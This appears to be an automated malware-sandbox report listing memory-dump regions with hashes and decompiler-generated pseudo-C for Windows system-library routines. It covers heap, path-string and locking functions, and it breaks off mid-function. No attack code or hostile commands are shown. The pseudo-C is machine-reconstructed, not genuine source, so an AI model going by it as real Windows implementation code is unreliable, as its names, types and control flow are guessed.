0x03496cf2
0x03496cf2
0x03496ce0
0x03454e3f
0x03454e41
0x03454e51
0x03454e51
0x03454e03
0x03454e03
0x03454e09
0x03454e0f
0x03454e57
0x00000000
0x00000000
0x03454e1b
0x03454e30
0x03454e5b
0x03454e5b
0x00000000
0x03454e30
0x03454e11
0x03454e11
0x03454e16
0x00000000
0x03454e16
0x03454e01
0x00000000
0x03454e01
0x03454da5
0x03496c6b
0x00000000
0x03454dab
0x03454dab
0x00000000
0x03454dab

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee174bd3e609461a497e5486e0de3a137d4f4c4c30cf2ac5881a74a56d89ca2
Instruction ID: 7b6d4a619164db69181a5932bda82e14bfbf000d1606aa733e72312b942a877a
Opcode Fuzzy Hash: bee174bd3e609461a497e5486e0de3a137d4f4c4c30cf2ac5881a74a56d89ca2
Instruction Fuzzy Hash: 2B41A075A403189FEB21DF16CC80F6BB7A9EB45610F0500ABFD499F381D774AD848A99

Uniqueness

Uniqueness Score: -1.00%

Function 03438A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03438A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x351d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0346B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0343E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3401180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03451DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03463C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03438999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x03438a0a
0x03438a1c
0x03438a23
0x03438a2e
0x03438a30
0x03438a36
0x03438a3c
0x03438a3e
0x03438a4a
0x03438a52
0x03438a9c
0x03438aae
0x03438a58
0x03438a5e
0x03438a6a
0x03438a6f
0x03438a75
0x03438a7d
0x03438a85
0x03438a86
0x03438a89
0x03438a93
0x03438a99
0x03438a9b
0x00000000
0x03438aaf
0x03438abe
0x03438ac3
0x03438acb
0x03438ad7
0x03438ae0
0x03438af1
0x00000000
0x03438af1
0x03438acd
0x03438ad5
0x03438afb
0x03438afd
0x03438aff
0x03438b07
0x03438b22
0x03438b24
0x03438b2a
0x03438b2e
0x03438b3f
0x03438b78
0x03438b41
0x03438b52
0x03438b54
0x03438b5c
0x03438b74
0x03438b74
0x03438b5c
0x03438b3f
0x03438b5e
0x03438b61
0x03438b64
0x03438b64
0x03438b6c
0x03438b6c
0x03438b11
0x03489cd5
0x03489cd5
0x03438b17
0x03438b1a
0x03438b1a
0x00000000
0x03438ad5
0x03438a89

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b61d86ae2050d3fedcdc60794c59d969cf011d412a9f5a6e04fc94265fb336
Instruction ID: 4828f9d0bc2c07eaab5c9d967d54c43ed09db2d3c8f4021df32e2e765d08bf04
Opcode Fuzzy Hash: 14b61d86ae2050d3fedcdc60794c59d969cf011d412a9f5a6e04fc94265fb336
Instruction Fuzzy Hash: CB4183B5A0032D9BDB24DF55C888AAAF3B8EB49300F1441EAF8199B351D7709E88CF54

Uniqueness

Uniqueness Score: -1.00%

Function 034A69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E034A69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x351d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03436C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E034A6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03469980() >= 0) {
							E03442280(_t56, 0x3518778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3518774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3518774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0342B6F0(0x340c338, 0x340c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03469520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E034695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0343FFB0(_t68, _t77, 0x3518778);
				}
				_pop(_t78);
				return E0346B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x034a69b5
0x034a69be
0x034a69c3
0x034a69c9
0x034a69cc
0x034a69d1
0x034a69d3
0x034a69de
0x034a69e1
0x034a69ea
0x034a69f6
0x034a69fe
0x034a6a13
0x034a6a14
0x034a6a15
0x034a6a16
0x034a6a1e
0x034a6a26
0x034a6a31
0x034a6a36
0x034a6a37
0x034a6a40
0x034a6a49
0x034a6a4a
0x034a6a53
0x034a6a59
0x034a6a5d
0x034a6a5e
0x034a6a64
0x034a6a67
0x034a6a6a
0x034a6a6d
0x034a6a70
0x034a6a77
0x034a6a7d
0x034a6a86
0x034a6a89
0x034a6a9c
0x034a6a9f
0x034a6aa2
0x034a6aa5
0x034a6aaf
0x034a6ab1
0x034a6ab8
0x034a6ab9
0x034a6abb
0x034a6abe
0x034a6ac5
0x034a6ac5
0x034a6aaf
0x034a6a40
0x034a6a26
0x034a69fe
0x034a6ace
0x034a6ad0
0x034a6ad3
0x034a6ad8
0x034a6adf
0x034a6adf
0x034a6ae8
0x034a6aef
0x034a6aef
0x034a6af9
0x034a6b06

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e653b300b8cd51a3d4889ee698e91d8e3ebb4f647f25b111f54f961cb506157a
Instruction ID: b583cf39de59d019eb74845512e87e0b1367d1d2f90d61ba4436bb7445ffd73e
Opcode Fuzzy Hash: e653b300b8cd51a3d4889ee698e91d8e3ebb4f647f25b111f54f961cb506157a
Instruction Fuzzy Hash: 33418CB1E00708AFDB20DFA9D840BAEFBF4EF48304F18812AE814AB250DB749905CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03425210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03425210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E034252A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E034695D0();
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0343EB70(_t54, 0x35179a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E034695D0();
								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0343EB70(_t54, 0x35179a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0346F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0343EB70(_t54, 0x35179a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E034695D0();
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x03425220
0x03425224
0x03480d13
0x03480d16
0x03480d19
0x0342522a
0x0342522a
0x0342522d
0x0342522d
0x03425231
0x03425235
0x03425239
0x03480d5c
0x03480d62
0x00000000
0x00000000
0x03480d6a
0x03480d7b
0x03480d7f
0x03480d81
0x03480d84
0x03480d95
0x03480d95
0x03480d6c
0x03480d71
0x03480d71
0x03480d9a
0x00000000
0x0342524a
0x0342524a
0x03425250
0x03480d24
0x03480d35
0x03480d39
0x03480d3b
0x03480d3e
0x03480d50
0x03480d50
0x03480d26
0x03480d2b
0x03480d2b
0x00000000
0x03480d55
0x03425256
0x0342525b
0x03425265
0x03480da7
0x0342526b
0x0342526e
0x03425272
0x03480db1
0x03480db4
0x03480dc5
0x03480dc5
0x03425272
0x03425278
0x0342527e
0x0342528a
0x0342528c
0x0342528d
0x00000000
0x03425280
0x03425282
0x03425288
0x0342529f
0x03425292
0x00000000
0x03425292
0x00000000
0x03425288
0x0342527e

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b4a4c2546b3790b71871a353c2e66b636e7ba72cdf53f2876846bfe8a3fdab
Instruction ID: c9f78dad4a7515ac8ed4ecde3f0ec8339c8061b1621d3714e5ebd4b01c585468
Opcode Fuzzy Hash: 83b4a4c2546b3790b71871a353c2e66b636e7ba72cdf53f2876846bfe8a3fdab
Instruction Fuzzy Hash: C331F332251B10EFC722EB19CD40B2ABBA5FF01764F55466BE4251F2E0DB70E845CAAC

Uniqueness

Uniqueness Score: -1.00%

Function 0345A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0345A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3500220);
				E0347D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3517b9c; // 0x0
				_t55 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0347D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3517b10 =  *0x3517b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x351536c; // 0x77f05368
					if( *_t51 != 0x3515368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3515368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x351536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0345A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0345a61c
0x0345a61e
0x0345a623
0x0345a628
0x0345a62b
0x0345a62d
0x0345a648
0x0345a64a
0x0345a64f
0x03499b44
0x0345a6ec
0x0345a6f1
0x0345a6f1
0x0345a655
0x0345a657
0x0345a65a
0x0345a65d
0x0345a662
0x0345a663
0x0345a667
0x0345a668
0x0345a66d
0x0345a706
0x0345a706
0x03499bda
0x03499be6
0x03499beb
0x00000000
0x03499beb
0x0345a679
0x03499b7a
0x00000000
0x03499b7a
0x0345a683
0x0345a6f4
0x0345a6f7
0x0345a6f9
0x0345a6fd
0x0345a6a0
0x0345a6a0
0x0345a6ad
0x0345a6af
0x0345a6b4
0x03499ba7
0x03499bac
0x00000000
0x00000000
0x03499bc6
0x03499bce
0x03499bd1
0x03499bd3
0x03499bd3
0x00000000
0x03499bd1
0x0345a6bd
0x0345a6c3
0x0345a6c6
0x0345a6d2
0x0345a701
0x0345a704
0x00000000
0x0345a704
0x0345a6d4
0x0345a6d6
0x0345a6d9
0x0345a6db
0x0345a6e1
0x0345a6e6
0x0345a6e8
0x0345a6e8
0x0345a6ea
0x00000000
0x0345a6ea
0x0345a688
0x0345a692
0x0345a694
0x0345a699
0x00000000
0x00000000
0x0345a69d
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab33e241dba3e30e9b065db1d3bf880593946e9903e07f8280e8f6df4c6372ec
Instruction ID: 7391c99340d96dfbce1d1edc4c8cc8ae30363c5c3352d1fc409a6fa7111d9887
Opcode Fuzzy Hash: ab33e241dba3e30e9b065db1d3bf880593946e9903e07f8280e8f6df4c6372ec
Instruction Fuzzy Hash: 254168B5E01205DFDB05CF59C490B9ABBF1BB49300F1881AEE814AF355D778A902CF58

Uniqueness

Uniqueness Score: -1.00%

Function 03463D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03463D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03437B60(0, _t61, 0x34011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03437B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03444620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03463d4c
0x03463d50
0x03463d55
0x03463d5e
0x0349e79a
0x00000000
0x0349e79a
0x03463d68
0x0349e789
0x03463d9d
0x03463da3
0x03463daf
0x03463db5
0x03463dbc
0x03463dc4
0x03463dc9
0x03463dce
0x0349e7ae
0x0349e7ae
0x03463dde
0x03463de2
0x03463de7
0x03463e0d
0x03463e13
0x03463e16
0x03463e1e
0x03463e25
0x03463e28
0x00000000
0x00000000
0x03463e2a
0x03463e2f
0x03463e37
0x03463e37
0x00000000
0x03463e37
0x03463e31
0x00000000
0x03463e31
0x03463e20
0x03463e20
0x03463e35
0x00000000
0x03463de9
0x03463de9
0x03463de9
0x03463dee
0x03463dfd
0x03463dff
0x03463e02
0x03463e05
0x03463e05
0x00000000
0x03463df0
0x03463de7
0x0349e78f
0x0349e794
0x03463d79
0x03463d84
0x03463d89
0x03463d8e
0x00000000
0x0349e7a4
0x03463d96
0x03463d9a
0x00000000
0x03463d9a
0x00000000
0x0349e794
0x03463d6e
0x03463d73
0x00000000
0x0349e7b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2858b0860667bdbd0dd60729756e3f73eb34c3d7e0bc4d8e344d06599fd7d35a
Instruction ID: 3ef9e625e28c6e7fef4557fe5e54574af6dd2bfaa12e06545760ce475cbe5205
Opcode Fuzzy Hash: 2858b0860667bdbd0dd60729756e3f73eb34c3d7e0bc4d8e344d06599fd7d35a
Instruction Fuzzy Hash: D3318139A05695DBD724CF29C841A6BBBB5EF45700B0980AFE459CF361E730D841C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0344C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0344C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03447D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E034F8D34(_v8, _t80);
					}
					E03442280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0343FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E034F8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0343FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0346B180();
						if(_a4 != 0) {
							E03442280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0344BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0344BB2D(_t16, _t15);
						E0344B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0343FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0343FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0343FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0344c18d
0x0344c18f
0x0344c191
0x0344c19b
0x0344c1a0
0x0344c1d4
0x0344c1de
0x03492d6e
0x0344c1e4
0x0344c1e4
0x0344c1e4
0x0344c1ec
0x03492d7d
0x03492d7d
0x0344c1f3
0x0344c1ff
0x03492d88
0x03492d8d
0x03492d94
0x03492d94
0x03492d9f
0x03492da4
0x03492dab
0x03492db0
0x03492db2
0x03492db3
0x03492db4
0x03492dbc
0x03492dc3
0x03492dc3
0x0344c205
0x0344c205
0x0344c208
0x0344c20e
0x0344c211
0x0344c216
0x0344c219
0x0344c21f
0x0344c222
0x0344c22c
0x0344c234
0x0344c23a
0x0344c23f
0x0344c245
0x0344c24b
0x0344c251
0x0344c25a
0x0344c276
0x0344c27d
0x0344c27d
0x0344c25c
0x0344c25c
0x00000000
0x0344c25e
0x0344c1a4
0x0344c1aa
0x0344c1b3
0x0344c265
0x0344c26c
0x0344c26c
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 8d4a6230255e0282c8257fd2a7f30b6e06aead9dfac84f8810902c836758c110
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: C531C275A0664ABEE704EBB5C480BEAF754BF46204F08416FD4184F201DB745A4ADBA9

Uniqueness

Uniqueness Score: -1.00%

Function 034A7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E034A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x351d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
